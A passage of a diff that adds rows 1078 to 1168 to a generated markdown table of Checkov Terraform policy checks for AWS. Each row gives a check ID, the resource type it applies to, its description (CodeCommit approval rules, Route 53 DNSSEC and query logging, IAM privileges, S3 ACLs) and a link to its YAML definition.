+| 1078 | CKV2_AWS_37     | resource | aws_ssm_association                                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1079 | CKV2_AWS_37     | resource | aws_ssm_document                                        | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1080 | CKV2_AWS_37     | resource | aws_ssm_maintenance_window                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1081 | CKV2_AWS_37     | resource | aws_ssm_maintenance_window_target                       | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1082 | CKV2_AWS_37     | resource | aws_ssm_maintenance_window_task                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1083 | CKV2_AWS_37     | resource | aws_ssm_parameter                                       | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1084 | CKV2_AWS_37     | resource | aws_ssm_patch_baseline                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1085 | CKV2_AWS_37     | resource | aws_ssm_patch_group                                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1086 | CKV2_AWS_37     | resource | aws_ssm_resource_data_sync                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1087 | CKV2_AWS_37     | resource | aws_storagegateway_cache                                | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1088 | CKV2_AWS_37     | resource | aws_storagegateway_cached_iscsi_volume                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1089 | CKV2_AWS_37     | resource | aws_storagegateway_gateway                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1090 | CKV2_AWS_37     | resource | aws_storagegateway_nfs_file_share                       | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1091 | CKV2_AWS_37     | resource | aws_storagegateway_smb_file_share                       | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1092 | CKV2_AWS_37     | resource | aws_storagegateway_upload_buffer                        | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1093 | CKV2_AWS_37     | resource | aws_storagegateway_working_storage                      | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1094 | CKV2_AWS_37     | resource | aws_subnet                                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1095 | CKV2_AWS_37     | resource | aws_swf_domain                                          | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1096 | CKV2_AWS_37     | resource | aws_transfer_server                                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1097 | CKV2_AWS_37     | resource | aws_transfer_ssh_key                                    | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1098 | CKV2_AWS_37     | resource | aws_transfer_user                                       | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1099 | CKV2_AWS_37     | resource | aws_volume_attachment                                   | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1100 | CKV2_AWS_37     | resource | aws_vpc                                                 | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1101 | CKV2_AWS_37     | resource | aws_vpc_dhcp_options                                    | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1102 | CKV2_AWS_37     | resource | aws_vpc_dhcp_options_association                        | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1103 | CKV2_AWS_37     | resource | aws_vpc_endpoint                                        | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1104 | CKV2_AWS_37     | resource | aws_vpc_endpoint_connection_notification                | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1105 | CKV2_AWS_37     | resource | aws_vpc_endpoint_route_table_association                | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1106 | CKV2_AWS_37     | resource | aws_vpc_endpoint_service                                | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1107 | CKV2_AWS_37     | resource | aws_vpc_endpoint_service_allowed_principal              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1108 | CKV2_AWS_37     | resource | aws_vpc_endpoint_subnet_association                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1109 | CKV2_AWS_37     | resource | aws_vpc_ipv4_cidr_block_association                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1110 | CKV2_AWS_37     | resource | aws_vpc_peering_connection                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1111 | CKV2_AWS_37     | resource | aws_vpc_peering_connection_accepter                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1112 | CKV2_AWS_37     | resource | aws_vpc_peering_connection_options                      | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1113 | CKV2_AWS_37     | resource | aws_vpn_connection                                      | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1114 | CKV2_AWS_37     | resource | aws_vpn_connection_route                                | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1115 | CKV2_AWS_37     | resource | aws_vpn_gateway                                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1116 | CKV2_AWS_37     | resource | aws_vpn_gateway_attachment                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1117 | CKV2_AWS_37     | resource | aws_vpn_gateway_route_propagation                       | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1118 | CKV2_AWS_37     | resource | aws_waf_byte_match_set                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1119 | CKV2_AWS_37     | resource | aws_waf_geo_match_set                                   | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1120 | CKV2_AWS_37     | resource | aws_waf_ipset                                           | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1121 | CKV2_AWS_37     | resource | aws_waf_rate_based_rule                                 | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1122 | CKV2_AWS_37     | resource | aws_waf_regex_match_set                                 | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1123 | CKV2_AWS_37     | resource | aws_waf_regex_pattern_set                               | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1124 | CKV2_AWS_37     | resource | aws_waf_rule                                            | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1125 | CKV2_AWS_37     | resource | aws_waf_rule_group                                      | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1126 | CKV2_AWS_37     | resource | aws_waf_size_constraint_set                             | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1127 | CKV2_AWS_37     | resource | aws_waf_sql_injection_match_set                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1128 | CKV2_AWS_37     | resource | aws_waf_web_acl                                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1129 | CKV2_AWS_37     | resource | aws_waf_xss_match_set                                   | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1130 | CKV2_AWS_37     | resource | aws_wafregional_byte_match_set                          | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1131 | CKV2_AWS_37     | resource | aws_wafregional_geo_match_set                           | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1132 | CKV2_AWS_37     | resource | aws_wafregional_ipset                                   | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1133 | CKV2_AWS_37     | resource | aws_wafregional_rate_based_rule                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1134 | CKV2_AWS_37     | resource | aws_wafregional_regex_match_set                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1135 | CKV2_AWS_37     | resource | aws_wafregional_regex_pattern_set                       | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1136 | CKV2_AWS_37     | resource | aws_wafregional_rule                                    | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1137 | CKV2_AWS_37     | resource | aws_wafregional_rule_group                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1138 | CKV2_AWS_37     | resource | aws_wafregional_size_constraint_set                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1139 | CKV2_AWS_37     | resource | aws_wafregional_sql_injection_match_set                 | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1140 | CKV2_AWS_37     | resource | aws_wafregional_web_acl                                 | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1141 | CKV2_AWS_37     | resource | aws_wafregional_web_acl_association                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1142 | CKV2_AWS_37     | resource | aws_wafregional_xss_match_set                           | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1143 | CKV2_AWS_37     | resource | aws_wafv2_ip_set                                        | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1144 | CKV2_AWS_37     | resource | aws_wafv2_regex_pattern_set                             | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1145 | CKV2_AWS_37     | resource | aws_wafv2_rule_group                                    | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1146 | CKV2_AWS_37     | resource | aws_wafv2_web_acl                                       | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1147 | CKV2_AWS_37     | resource | aws_wafv2_web_acl_association                           | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1148 | CKV2_AWS_37     | resource | aws_wafv2_web_acl_logging_configuration                 | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1149 | CKV2_AWS_37     | resource | aws_worklink_fleet                                      | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1150 | CKV2_AWS_37     | resource | aws_worklink_website_certificate_authority_association  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1151 | CKV2_AWS_37     | resource | aws_workspaces_directory                                | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1152 | CKV2_AWS_37     | resource | aws_workspaces_ip_group                                 | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1153 | CKV2_AWS_37     | resource | aws_workspaces_workspace                                | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1154 | CKV2_AWS_37     | resource | aws_xray_sampling_rule                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1155 | CKV2_AWS_38     | resource | aws_route53_zone                                        | Ensure Domain Name System Security Extensions (DNSSEC) signing is enabled for Amazon Route 53 public hosted zones                                                                                        | Terraform | [Route53ZoneEnableDNSSECSigning.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/Route53ZoneEnableDNSSECSigning.yaml)                                                           |
+| 1156 | CKV2_AWS_39     | resource | aws_route53_zone                                        | Ensure Domain Name System (DNS) query logging is enabled for Amazon Route 53 hosted zones                                                                                                                | Terraform | [Route53ZoneHasMatchingQueryLog.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/Route53ZoneHasMatchingQueryLog.yaml)                                                           |
+| 1157 | CKV2_AWS_40     | resource | aws_iam_group_policy                                    | Ensure AWS IAM policy does not allow full IAM privileges                                                                                                                                                 | Terraform | [IAMPolicyNotAllowFullIAMAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMPolicyNotAllowFullIAMAccess.yaml)                                                           |
+| 1158 | CKV2_AWS_40     | resource | aws_iam_policy                                          | Ensure AWS IAM policy does not allow full IAM privileges                                                                                                                                                 | Terraform | [IAMPolicyNotAllowFullIAMAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMPolicyNotAllowFullIAMAccess.yaml)                                                           |
+| 1159 | CKV2_AWS_40     | resource | aws_iam_role_policy                                     | Ensure AWS IAM policy does not allow full IAM privileges                                                                                                                                                 | Terraform | [IAMPolicyNotAllowFullIAMAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMPolicyNotAllowFullIAMAccess.yaml)                                                           |
+| 1160 | CKV2_AWS_40     | resource | aws_iam_user_policy                                     | Ensure AWS IAM policy does not allow full IAM privileges                                                                                                                                                 | Terraform | [IAMPolicyNotAllowFullIAMAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMPolicyNotAllowFullIAMAccess.yaml)                                                           |
+| 1161 | CKV2_AWS_40     | resource | aws_ssoadmin_permission_set_inline_policy               | Ensure AWS IAM policy does not allow full IAM privileges                                                                                                                                                 | Terraform | [IAMPolicyNotAllowFullIAMAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMPolicyNotAllowFullIAMAccess.yaml)                                                           |
+| 1162 | CKV2_AWS_40     | resource | data.aws_iam_policy_document                            | Ensure AWS IAM policy does not allow full IAM privileges                                                                                                                                                 | Terraform | [IAMPolicyNotAllowFullIAMAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMPolicyNotAllowFullIAMAccess.yaml)                                                           |
+| 1163 | CKV2_AWS_41     | resource | aws_instance                                            | Ensure an IAM role is attached to EC2 instance                                                                                                                                                           | Terraform | [EC2InstanceHasIAMRoleAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/EC2InstanceHasIAMRoleAttached.yaml)                                                             |
+| 1164 | CKV2_AWS_42     | resource | aws_cloudfront_distribution                             | Ensure AWS CloudFront distribution uses custom SSL certificate                                                                                                                                           | Terraform | [CloudFrontHasCustomSSLCertificate.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CloudFrontHasCustomSSLCertificate.yaml)                                                     |
+| 1165 | CKV2_AWS_43     | resource | aws_s3_bucket_acl                                       | Ensure S3 Bucket does not allow access to all Authenticated users                                                                                                                                        | Terraform | [S3NotAllowAccessToAllAuthenticatedUsers.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3NotAllowAccessToAllAuthenticatedUsers.yaml)                                         |
+| 1166 | CKV2_AWS_44     | resource | aws_route                                               | Ensure AWS route table with VPC peering does not contain routes overly permissive to all traffic                                                                                                         | Terraform | [VPCPeeringRouteTableOverlyPermissive.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/VPCPeeringRouteTableOverlyPermissive.yaml)                                               |
+| 1167 | CKV2_AWS_44     | resource | aws_route_table                                         | Ensure AWS route table with VPC peering does not contain routes overly permissive to all traffic                                                                                                         | Terraform | [VPCPeeringRouteTableOverlyPermissive.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/VPCPeeringRouteTableOverlyPermissive.yaml)                                               |
+| 1168 | CKV2_AWS_45     | resource | aws_config_configuration_recorder                       | Ensure AWS Config recorder is enabled to record all supported resources                                                                                                                                  | Terraform | [AWSConfigRecorderEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AWSConfigRecorderEnabled.yaml)                                                                       |
